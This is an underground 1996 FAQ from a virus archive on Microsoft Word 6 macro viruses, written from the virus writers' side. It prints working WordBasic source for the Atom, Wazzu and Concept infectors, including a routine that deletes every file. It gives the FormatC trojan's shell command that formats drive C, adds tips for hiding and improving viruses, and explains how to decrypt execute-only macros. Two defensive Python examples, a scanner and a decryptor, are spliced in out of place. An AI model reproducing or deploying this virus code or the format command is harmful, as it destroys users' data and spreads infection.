VX Heaven

The UNDERGROUND MS WORD 6.x MACRO VIRUSES FAQ V2.0

Aurodreph
1996


What is a Word macro virus?

A WORD MACRO virus is a macro (list of instructions) or template file (usually with the .DOT extension) which masquerades as a legitimate MS WORD document (usually with the extension *.DOC). An infected *.DOC file doesn't look any different to the average PC user, as it can still contain a normal document. The difference is that this document is really just a template or macro file, with instructions to replicate and possibly cause damage. MS WORD will interpret the *.DOT macro/template file as a template file regardless of its extension. This allows it to be passed off as a legitimate document (*.DOC). This FAQ takes the position that a document is meant to be DATA, and a MACRO is at least partially executable CODE. When a document has been infected, it has been merged with executable code in a multi-part file, part data/part executable. This tends to be hidden from the user, who expects a document to be data that is READ, and not some combination of DATA and executable code designed to be executed, often against the will of the user, to wreak havoc.

These viruses commonly tend to infect the global macros, which get automatically saved at the end of each session. When the next session of MS WORD opens, the infected global macros are executed, the WORD environment is now infected, and it will in turn be likely to infect documents whenever they are opened, closed, or created during all future sessions.

As a virus, the WORD MACRO VIRUSES do REPLICATE. They can spread in most cases to any MS WINDOWS environment or OS that runs a compatible copy of MS WORD 6.x or 7.x, MS WORD 6.x running on OS/2, as well as WORD for MAC 6.0 for MacOS. This makes it a multi-platform/multi-OS file infector. It also makes it one of the first non-research viruses to be successfully spread to all of these environments and OS's.

MS Word Macro Viruses reside in interpreted data that can spread to different OS's/platforms. These viruses do not spread via modification of executable machine code, but by modification of data in files that are interpreted by the Microsoft Word 6.0 program and any other versions of Word that support macros and WordBasic.

The WordBasic macro language is much simpler to learn and master than ASSEMBLER, or other popular higher-level programming languages, and for this reason Vx people (both new and old alike) have taken to it as a viable alternative to learning and coding ASM. The thought of ticking users off on more than one platform has been around for years, and now, thanks to MS WORD and all its compatible versions on other popular platforms, the Vx people have their wish. Another bonus of this new outlet for Vx writers is that many virus scanners only scan executable files, leaving the .DOC files of WORD alone. It is important to note that many AV producers have now added scanners/cleaners to their software, allowing for the detection of existing MS WORD macro viruses.

How to study an infected document

You are happy :-) You found the latest macro virus, and now you want to study it, find the source code and modify it. OK, I'll explain... it's very easy.

First of all, make a copy of the NORMAL.DOT file (it's in MSOFFICE\WINWORD\MODELES). In most cases the macro virus isn't dangerous, except for the trojan FORMATC: in fact, when you read the document, it formats C:. So a good idea is to run a TSR anti-virus like VIRSTOP. Now launch the WORD application, and ...(this is when it executes)... then go to the menu TOOLS/OPTIONS and, in the SAVE section, click to select the option "Prompt to Save NORMAL.DOT".

Then take a look at the file with a hex editor. A Word document is composed of a first part, the data (text), then the macros, and in the last part, the data (name of the file, ...). OK. Find the name of the document near the end... and look for a "U". If you see some U's, this means that the macros are encrypted. You will need more time to study them, because when you copy a macro, WORD gives you the READ-ONLY option: you can execute the macro, but you can't see the source... If you look near the name, you can see the names of all the macros included in the file. The names can give you an idea of what they do... but be careful!!

Now open the infected document and see what it does. Nothing... It's normal!! Go to the menu TOOLS/MACRO. You can see the names of the macros (the same ones you saw with the hex editor).

IF you can't use the Modify button, the macro is Execute-only... THEN go to TOPIC 4. Else, read the script and keep what you want...

VIRUS EXAMPLES and what you can keep in mind

I have studied some macro viruses for you and I've commented them...

Concept Virus

Also known by the aliases WW6Macro, WinWord.Concept, Word Basic Macro Virus (WBMV), Word Macro 9508 (MAC) and Prank Macro (Microsoft named it Prank to downplay the seriousness of the situation). This was the first MS macro virus to be detected by the anti-virus community, and the first macro virus to be considered in the wild, with infections spreading to the US, UK, France, Germany, Bulgaria, Canada, the Netherlands, Turkey, Finland, and other countries.

A CONCEPT infection is easy to notice: on the first execution of the virus-infected document (on the first opening of the infected file) a MessageBox appears with the digit "1" inside and an "Ok" button. Also, simply checking the TOOLS/MACROS option to list loaded macros, the presence of Concept is apparent from these 5 macros:

AAAZFS *
AAAZAO *
AutoOpen
PayLoad *
FileSaveAs

The infection routine of this virus:

'see if we're already installed
For i = 1 To iMacroCount
If MacroName$(i, 0, 0) = "PayLoad" Then
bInstalled = - 1
End If
If MacroName$(i, 0, 0) = "FileSaveAs" Then
bTooMuchTrouble = - 1
End If
Next i
If Not bInstalled And Not bTooMuchTrouble Then
'add FileSaveAs and copies of AutoOpen and FileSaveAs.
'PayLoad is just for fun.
iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
sMe$ = FileName$()
sMacro$ = sMe$ + ":Payload"
MacroCopy sMacro$, "Global:PayLoad"
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:FileSaveAs"
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:AAAZFS"
sMacro$ = sMe$ + ":AAAZAO"
MacroCopy sMacro$, "Global:AAAZAO"

At the end of each MacroCopy, put ,1 and you have Execute-Only macros... just an idea :)

Nuclear

Known widely as Winword.Nuclear, Wordmacro-Nuclear and Wordmacro-Alert. This virus was the first WordMacro virus to infect (or at least to attempt to infect) both data/documents (Word documents, .DOT and .DOC) as well as executables (.COM/.EXE/NewEXE).

In truth, it is 2 viruses: a macro virus which alters the operating environment of WORD, and an executable file infector (as well as a system file deleter). This makes NUCLEAR the first macro virus to also incorporate, or at least try to incorporate, a classic file infector virus. This virus is actually quite ineffective in the destructive sense, as detailed later in this document. The infected documents contain the following nine macros...

AutoExec
AutoOpen
FileSaveAs
FilePrint
FilePrintDefault
InsertPayload *
Payload *
DropSuriv *
FileExit

which get copied into the GLOBAL Macro List.

General detection of NUCLEAR is easy: simply view the macros listed under the Macros command in the Tools menu. If the macros "InsertPayload", "Payload", and "DropSuriv" are listed, then you likely have a NUCLEAR infection (unless you named legitimate macros with the same names... :) ). NUCLEAR hides itself from detection by disabling the "PROMPT FOR CHANGES TO NORMAL.DOT" option. Changes are made, and the user doesn't notice anything.

The "InsertPayload" macro adds text to the end of printouts when printing documents. Every 12th printout will have the following text added...

And finally I would like to say: STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC!

which is appended to the file after the command to print is issued but prior to the actual printing. FAXes sent via a FAX print driver will also be affected; this much I know first hand. From testing, I came to the realization that some Vx putz will start messing with my outgoing faxes behind our backs.

Another included macro is "Payload", which tries to delete IO.SYS, MSDOS.SYS and COMMAND.COM on April 5th. It is ineffective, as WordBasic can't reset the attributes of a file which has the System attribute set. It has been noted that a variant that does work is being circulated.

The second part of the Nuclear virus is the executable infector. The DropSuriv macro checks the system time, and will attempt to drop the file infector between 17:00 and 18:00. However, the routine is flawed, and shouldn't work on any system (it fails due to a syntax error, an unclosed IF statement, which means this payload is never executed). If DropSuriv DID work properly, it would search for the standard DOS utility DEBUG.EXE; if found, the macro drops PH33r.SCR and EXEC_PH.BAT. The BAT file is executed, the hex dump file PH33r.SCR is converted from a DEBUG script into an executable, and that executable is in turn run. Afterwards, the .SCR and .BAT files are deleted to cover its tracks. The file infector then hooks INT 21h and writes itself at the end of COM/EXE/NewEXE files. (However, the memory is released once this DOS task is completed, including the memory-resident virus Ph33r.) Unconfirmed reports state that a NUCLEAR-infected macro with a fully operational DropSuriv macro exists.

The following text strings are in the executable infector...

=Ph33r=
Qark/VLAD

The virus group VLAD published it in issue no. 4. (I think the complete version of this virus is there, so find it on the Net.)

Colors

Colors is the first WINWORD macro virus that could be called cute (IMHO). This virus has the noticeable ability to alter the Windows color settings.

If iModEvery = (iEvery - 1) Then
sColors$(0) = "Background"
sColors$(1) = "AppWorkspace"
...
sColors$(19) = "InactiveTitleText"
sColors$(20) = "ButtonHilight"

For i = 0 To 20
SetProfileString("colors", sColors$(i), Str$(Int(Rnd() * 256)) + " "
+ Str$(Int(Rnd() * 256)) + " " + Str$(Int(Rnd() * 256)))
Next i
End If

Mac Word is immune to the payload <the system colors attack> but is still susceptible to the infection mechanism, which will attack documents. Detection of infections is easy, as infected documents appear with the template icon rather than the usual document icon.

Commonly known as Rainbow or WordMacro.Colors, this virus was freely posted to usenet newsgroups on October 14th, 1995. The Colors Virus will infect the global template <usually NORMAL.DOT> upon opening of an infected document. An infected document contains the following macros:

AutoOpen
AutoClose
AutoExec
FileNew
FileExit
FileSave
FileSaveAs
ToolsMacro, and other macros.

All macros included in COLORS are Execute-Only, and cannot be viewed or edited by Microsoft Word. If normal "clean" macros with the same names existed prior to infection, they will be overwritten by COLORS.

The AutoExec macro of COLORS is an EMPTY macro, possibly designed to defeat any ANTI-MACRO-VIRUS schemes developed by the AV community. It accomplishes this by overwriting a "CLEANING/SCANNER" AutoExec macro with COLORS' empty one, effectively making the AV scanner/cleaner useless.

COLORS will also enable AutoMacros in case you were smart and disabled them! It will also disable MS Word's prompt to save changes to NORMAL.DOT.

[ OutilsOptionsEnregistrement .InviteGlobalDot = 0 ] Very interesting

COLORS is crafty, as it can spread without the use of AUTO macros... thus defeating the DISABLE AUTOMACROS Feature. It does so via the Macros:

File/New
File/Save
File/SaveAs
File/Exit
Tools/Macro

COLORS will infect NORMAL.DOT whenever a user chooses any of the above functions. It also has limited stealth ability, earning it the title of the first WINWORD STEALTH MACRO VIRUS. It accomplishes its stealth by hiding itself from the active listing: attempting to view active macros runs the COLORS-infected Tools/Macro, which hides its own presence while simultaneously infecting your system.

[ MacroTools .Name = sNames$(i), .Print = 1, .Delete ] Good !!!

The COLORS virus keeps track of infections via a counter named "countersu", which can be found under the [Windows] section of the WIN.INI file. Whenever an infected macro is executed, the counter is incremented by one. It quickly adds up when you consider how often you OPEN, CREATE, SAVE, EXIT, and CLOSE documents. When the counter reaches 299, and on every 300th execution thereafter, COLORS will be triggered. COLORS will then make changes to the system colors setup, including text, background, borders, buttons, etc., using randomly determined colors. The new color scheme becomes apparent to the user during the next session of Windows.

Colors' ability to spread without the use of AutoExecute macros, and its use of advanced stealth techniques, signal a new level of macro virus technology. (Hiding itself from view when you actively look for it defines STEALTH in my book, since it evades detection.) It also adds fuel to the VxD argument, as an on-access scanner could prevent infection by this type of stealthy virus.

You have the complete disassembly in the previous issue... so download it...

DMV

Commonly known as WordMacro.DMV, DMV is an unremarkable TEST virus, possibly the first to be created using the WordBasic language. Joel McNamara wrote it in the fall of 1994 as a real-time TEST for some macro virus theories. The virus was kept under wraps, and a detailed paper was published. This TEST virus was only released, as an educational aid, after the CONCEPT virus was discovered. DMV isn't a threat to anyone, as it announces itself upon infecting the system.

Nothing to say, it's an old virus, and by now all the techniques it uses are detected by most AV software.

HOT

Also known as WORDMACRO HOT, WinWord.Hot.

Not the most ingenious of the macro virus family, its biggest kick is the ability to wait or sleep for a while <up to 14 days> and then delete a file. WordMacro/Hot appears to be the first Word macro virus written in Russia. It was found in the wild in Russia in January 1996.

Infected documents contain four execute-only macros:

AutoOpen
DrawBringInFrOut
InsertPBreak
ToolsRepaginat

Macintosh Word users will notice HOT by examining the icon of the file... infected documents appear with the template icon, normal documents appear with the normal document icon.

NOTE: WordMacro/Hot appears to be the first macro virus to use external functions, allowing Word macros to call any standard Windows API. This makes the spreading function Windows 3.x specific, preventing Word for MAC and Word 7 for Win '95 from spreading the virus. An error dialog will be displayed under Microsoft Word 7.0:

Unable to load specified library

HOT activates automatically via its AutoOpen macro (assuming no attempt to disable AutoMacros has been made), adding a line LIKE...

QLHot=34512

to MS Word for Windows 6's WINWORD6.INI file, which acts as a counter recorder system, setting a date 14 days in the future for payload activation.

HOT then copies the included macros to the global template (NORMAL.DOT usually), renaming them...

AutoOpen ==> StartOfDoc
DrawBringInFrOut ==> AutoOpen
InsertPBreak ==> InsertPageBreak
ToolsRepaginat ==> FileSave

A listing of the currently loaded macros in this infected environment will reveal the names in the right-hand list. Loading another infected document (actually a template) will add the left-hand list to the macro list, in addition to the right-hand list. NOTE: the macros have been saved with the 'execute-only' feature, which means that a user can't view or edit them.

A clean (AutoMacros disabled) WORD environment will show the left-hand list when viewing an infected document.

HOT's FileSave macro causes the virus to randomly decide, within 1-6 days from the infection date, to activate whenever an effort to open files is made. Upon activation, a document will have its contents deleted by opening it, selecting the entire contents, deleting them, and closing the document, saving it in its now empty state.

Users with c:\DOS\EGA5.CPI should be protected from this macro, as the author included a check for this file as a protective measure, noted in the source code as follows:

'---------------------------------------------------------------
'- Main danger section: if TodayNo=(QLHotDateNo + RndDateNo) ---
'- and if File C:\DOS\ega5.cpi not exist (not for OUR friends) ---
'---------------------------------------------------------------

HOT's InsertPBreak macro inserts a page break in the current document, which is used as a sign of a document already being infected by HOT.

NOTE: WordMacro/Hot relies on the existence of KERNEL.EXE

I can see this macro, if you have it, please send it to the mag.... thanks

MS WORD 2/MS WORD 6.x macro trojan weideroffen

This is a new MACRO trojan (that's been around for 2 years) that goes by the alias WinWord.Weideroffnen. It is technically a WinWord 2 infected document that works equally well under MS WORD 6.x. It intercepts AutoClose, and attempts to play tricks with the boot-up file AUTOEXEC.BAT.

I haven't seen this macro virus, so I don't know...

WORDMACRO ATOM / ATOMIC

This is a new Macro Virus, found in February 1996, which works along the same general ideas as the original Concept virus. The WordMacro/Atom virus is not known to be in the wild.

The differences, when compared to the Concept virus, are as follows:

On December 13th its first point of activation occurs. It will attempt to delete all files in the current directory.

The second activation password-protects documents, restricting users' access to their own documents. This happens when the system clock's seconds counter equals 13 and a File/Save As command is issued. The password assigned to the documents is ATOM#1.

If the user disables AUTOMACROS, Atom will be unable to execute and spread to other documents. Enabling the Prompt To Save NORMAL.DOT will prevent Atom from attacking and infecting the NORMAL.DOT file.

Here is the source. Keep in mind the idea of putting a password on a file, not a bad idea....

Macros: Atom

Sub MAIN
On Error Goto KillError
If Day(Now()) = 13 And Month(Now() = 12) Then
Kill "*.*"
End If
KillError:
End Sub

Macros: AutoOpen

Sub MAIN
Dim FN$
FN$ = FileName$()
On Error Goto ErrorInfectGlobalTemplate
If (CheckInfected = 0) Then
MacroCopy FN$ + ":FileSaveAs", "FileSaveAs", 1
MacroCopy FN$ + ":FileOpen", "FileOpen", 1
MacroCopy FN$ + ":AutoOpen", "AutoOpen", 1
MacroCopy FN$ + ":Atom", "Atom", 1
SaveTemplate
End If
Call Atom
ErrorInfectGlobalTemplate:
End Sub

Function CheckInfected
CheckInfected = 0
If (CountMacros(0) >= 4) Then
For I = 1 To CountMacros(0)
If (MacroName$(I, 0) = "Atom") Then
CheckInfected = 1
End If
Next I
End If
End Function

Macros: FileOpen

Sub MAIN
On Error Goto InfError
Dim dlg As FileOpen
GetCurValues dlg
Dialog dlg
FileOpen dlg
MacroCopy "AutoOpen", Dlg.Name + ":AutoOpen", 1
MacroCopy "FileSaveAs", Dlg.Name + ":FileSaveAs", 1
MacroCopy "FileOpen", Dlg.Name + ":FileOpen", 1
MacroCopy "Atom", Dlg.Name + ":Atom", 1
FileSaveAs .Format = 1
InfError:
End Sub

Macros: FileSaveAs

Sub MAIN
Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
If (Dlg.Format = 0) Or (Dlg.Format = 1) Then
MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs", 1
MacroCopy "AutoOpen", WindowName$() + ":AutoOpen", 1
MacroCopy "FileOpen", WindowName$() + ":FileOpen", 1
MacroCopy "Atom", WindowName$() + ":Atom", 1
Dlg.Format = 1
End If
If (Second(Now()) = 13) Then   ' ] easy... to block a document
Dlg.Password = "ATOM#1"   ' ] an idea: why not put a randomized passwd ?
End If
FileSaveAs dlg
End Sub
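A defender-side check built from the macro-name lists given above for Concept, Nuclear, Hot and Atom, as an added example that is not part of the FAQ: it searches the raw bytes of a Word 6 file for the macro names a clean template would never carry. It assumes, as the FAQ's hex-editor walkthrough implies, that macro names are stored as plain ASCII; the sample "documents" are constructed here.

```python
import re

# Distinctive macro names per family, taken from the FAQ's listings. Names that
# are also standard Word commands (AutoOpen, FileSaveAs, FileOpen, ...) are
# deliberately left out: they are present in clean templates too.
# "StartOfDoc" / "InsertPageBreak" are the names Hot gives its copies inside
# the global template, so they flag an infected NORMAL.DOT rather than a .DOC.
SIGNATURES = {
    "Concept": {b"AAAZFS", b"AAAZAO", b"PayLoad"},
    "Nuclear": {b"InsertPayload", b"Payload", b"DropSuriv"},
    "Hot (document)": {b"DrawBringInFrOut", b"InsertPBreak", b"ToolsRepaginat"},
    "Hot (global template)": {b"StartOfDoc", b"InsertPageBreak"},
    "Atom": {b"Atom"},
}


def find_macro_names(data: bytes, names) -> set:
    """Return the subset of `names` present in `data` as whole tokens.

    The look-arounds keep "Atom" from matching inside "Atomic" and
    "StartOfDoc" from matching the built-in StartOfDocument command.
    Matching is case-sensitive on purpose: Concept's "PayLoad" and
    Nuclear's "Payload" are different macros.
    """
    found = set()
    for name in names:
        pattern = rb"(?<![A-Za-z0-9_])" + re.escape(name) + rb"(?![A-Za-z0-9_])"
        if re.search(pattern, data):
            found.add(name)
    return found


def scan(data: bytes) -> dict:
    """Map each family with at least one hit to (matched names, complete).

    `complete` is True when every distinctive name of that family was found,
    which is the condition the FAQ gives for calling it an infection.
    """
    report = {}
    for family, names in SIGNATURES.items():
        found = find_macro_names(data, names)
        if found:
            report[family] = (sorted(n.decode() for n in found), found == names)
    return report


# Constructed samples: a length byte before each name stands in for whatever
# the real macro table puts there; the scanner does not depend on it.
SAMPLE_CONCEPT = (b"\x00\x06AAAZFS\x00\x06AAAZAO\x00\x08AutoOpen"
                  b"\x00\x07PayLoad\x00\x0aFileSaveAs\x00")
SAMPLE_HOT_DOC = b"\x08AutoOpen\x10DrawBringInFrOut\x0cInsertPBreak\x0eToolsRepaginat\x00"
SAMPLE_CLEAN = b"Quarterly report on Atomic Energy\x00\x08AutoOpen\x0fStartOfDocument\x00"

if __name__ == "__main__":
    for label, doc in (("concept", SAMPLE_CONCEPT), ("hot", SAMPLE_HOT_DOC),
                       ("clean", SAMPLE_CLEAN)):
        print(label, scan(doc))
```

Scanning NORMAL.DOT with the same function catches Hot's renamed copies, which is the case the FAQ says a Tools/Macro listing on an infected machine reveals.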

FormatC macro trojan

Also known as WORDMACRO.FORMATC, and FORMAT.C.Macro.Trojan

The FORMATC macro virus isn't even a virus, as it DOES NOT SPREAD. This makes it another MACRO TROJAN. This trojan contains only one macro, AutoOpen, which will be executed automatically when a document is opened. The macro AutoOpen is READ ONLY, making it encrypted, unreadable and uneditable. It is visible in the macro list.

When FORMATC is executed ("triggered"), it will run a DOS session in a minimized DOS box, performing an unconditional format of the C drive.

Here is the macro, basic but deadly...

Sub MAIN
sCmd$ = "echo y|format c: /u"
Shell Environnement$("COMSPEC") + "/c " + sCmd$, 0
End Sub

If you want to execute DOS commands, you have here a hint on how to do it.

WORDMACRO WAZZU

WordMacro/Wazzu consists of a single AutoOpen macro; this makes it language independent, i.e. this macro virus is able to infect localized versions of Word as well as the English Word.

It inserts the word "Wazzu" into your text... why not.... Nothing more to say, classic...

Sub MAIN
On Error Goto errCaught

FileSummaryInfo .Update
Dim dlg As FileSummaryInfo
GetCurValues dlg

fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":autoOpen"
globMacro$ = "Global:autoOpen"
MacroFile$ = UCase$(Right$(MacroFileName$(MacroName$(0)), 10))

If MacroFile$ = "NORMAL.DOT" Then
MacroCopy globMacro$, fileMacro$
FileSaveAs .Format = 1
Else
MacroCopy fileMacro$, globMacro$
End If

Payload

Goto bye
errCaught:

bye:
On Error Goto 0

End Sub

Sub Payload
For i = 1 To 3
If Rnd() < 0.2 Then
RndWord
SelectCurWord
selWord$ = Selection$()
DeleteWord

RndWord
Insert selWord$ + " "
End If
Next

If Rnd() < 0.25 Then
RndWord
Insert "wazzu "   ' <------------------- here's the payload
StartOfDocument
End If

End Sub

Sub RndWord
FileSummaryInfo .Update
Dim dlg As DocumentStatistics
GetCurValues dlg

wordNum = Int(Rnd() * Val(dlg.Words))
StartOfDocument
WordRight wordNum
End Sub

What to do with execute-only macros

Easy: when you copy a macro with option 1, Microsoft Word encrypts the source of the macro, so when you look at the file you can't see it.... But the encryption they use is stupid :))) a single XOR value... so the only difficult thing is to find the XOR key... you must scan the file, and the XOR value is included in it...

I'll explain the method: locate the "real" filename of the document within the document. A few bytes after the end of the name there is a "U", and the byte immediately following is the... XOR value to use. Now, the beginning of the macros is usually at B89h or at 1509h. To locate it, there is always the sequence A5h C6h 41h, then a byte, and then the XOR value....

This is the standard method; you must know that each macro has its own XOR value... when you look for the filename, you will find as many U's as there are macros in the document.

I encountered some difficulties when the document is composed of encrypted macros and normal macros... In this case, try to delete some macros and then decrypt...

I can give you a little C source to help you. This source uses a brute-force method, so you will get 1 readable macro per file.... try it with the COLORS macro (last issue). I know that the software works well.
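The brute-force approach the author mentions, as an added Python example for analysts (not the author's C source): all 256 single-byte XOR keys are tried on an execute-only macro body and the one that yields readable WordBasic is kept, and a second function applies the FAQ's "U" marker shortcut so the two can be cross-checked. The document bytes and the macro are constructed here, and the marker layout is assumed to be exactly as the FAQ states it.

```python
# Byte values a readable WordBasic source is made of.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}
# Tokens that almost every macro listed in the FAQ contains.
KEYWORDS = (b"Sub MAIN", b"End Sub", b"MacroCopy")


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply one XOR key byte to every byte (the scheme the FAQ describes)."""
    return bytes(b ^ key for b in data)


def readability(plain: bytes) -> float:
    """Fraction of printable bytes plus one point per WordBasic keyword seen."""
    if not plain:
        return 0.0
    printable = sum(1 for b in plain if b in PRINTABLE) / len(plain)
    return printable + sum(1.0 for kw in KEYWORDS if kw in plain)


def recover_key(cipher: bytes) -> int:
    """Brute force: the key whose decryption looks most like macro source."""
    return max(range(256), key=lambda k: readability(xor_bytes(cipher, k)))


def key_from_marker(doc: bytes, filename: bytes):
    """The FAQ's shortcut: a few bytes after the document's own filename sits
    a 'U' byte, and the byte right after it is the XOR key. Returns None when
    the pattern is absent. (Layout taken from the FAQ, not verified here.)"""
    pos = doc.find(filename)
    if pos < 0:
        return None
    marker = doc.find(b"U", pos + len(filename))
    if marker < 0 or marker + 1 >= len(doc):
        return None
    return doc[marker + 1]


def decrypt_macro(cipher: bytes, doc: bytes = b"", filename: bytes = b""):
    """Return (key, plaintext, marker_agrees).

    marker_agrees is None when no document/filename was given, otherwise
    True/False, so a wrong assumption about the layout is visible instead of
    silently producing garbage."""
    key = recover_key(cipher)
    agrees = None
    if doc and filename:
        agrees = key_from_marker(doc, filename) == key
    return key, xor_bytes(cipher, key), agrees


# Constructed sample: a harmless macro, encrypted with an arbitrary key, placed
# in a fake document after a filename record and the 'U' marker.
PLAIN_MACRO = b'Sub MAIN\r\nMsgBox "clean test macro"\r\nEnd Sub\r\n'
KEY = 0x9C
CIPHER_MACRO = xor_bytes(PLAIN_MACRO, KEY)
SAMPLE_DOC = (b"\x00\x0aREPORT.DOC\x00\x00U" + bytes([KEY]) + b"\x00\x00"
              + CIPHER_MACRO + b"\x00")

if __name__ == "__main__":
    key, plain, agrees = decrypt_macro(CIPHER_MACRO, SAMPLE_DOC, b"REPORT.DOC")
    print(f"key=0x{key:02X} marker_agrees={agrees}")
    print(plain.decode())
```

With several encrypted macros in one file, run recover_key on each macro region separately, since the FAQ notes every macro carries its own key.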

This FAQ is Copyright (z) 1996

MicroFuck (tm), Windows, Word, EXCEL are Copyright (z) 1995-96 MicroFuck Corp. All rights reserved to the virus makers...

P.S.: sorry, but I don't use an ENGLISH version of Word, so some names of the instructions could be incorrect!!! Just use the F1 option and find the nearest name....
